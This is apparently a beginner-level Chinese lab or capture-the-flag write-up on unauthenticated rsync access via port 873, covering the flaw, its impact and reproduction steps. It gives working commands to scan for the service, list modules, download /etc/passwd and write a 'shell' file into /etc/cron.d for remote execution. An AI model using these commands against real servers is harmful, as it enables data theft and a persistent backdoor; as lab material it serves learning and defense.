【初级】rsync-common 未授权访问

漏洞描述：rsync是Linux/Unix下的一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件和目录，默认运行在873端口。由于配置不当，导致任何人可未授权访问rsync，上传本地文件，下载服务器文件。

rsync未授权访问带来的危害主要有两个：一是造成了严重的信息泄露；二是上传脚本后门文件，远程命令执行。

影响版本：全版本

参考资料：

• https://www.cnblogs.com/renhaoblog/p/13279101.html
• https://fansonfan.github.io/2019/04/20/rsync-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
• https://www.freebuf.com/column/202771.html

漏洞复现

• 使用nmap扫描目标系统是否开放rsync服务

• nmap -p 873 ip

• 使用以下两条命令，列出目标服务器的同步目录

• rsync ip::
• rsync rsync://ip:873

• 在路径后面添加目录名即可查看目录中的文件

• rsync ip::src

• 获取flag

其它操作

任意下载
rsync -av rsync://your-ip:873/src/etc/passwd ./

写入任意文件
rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell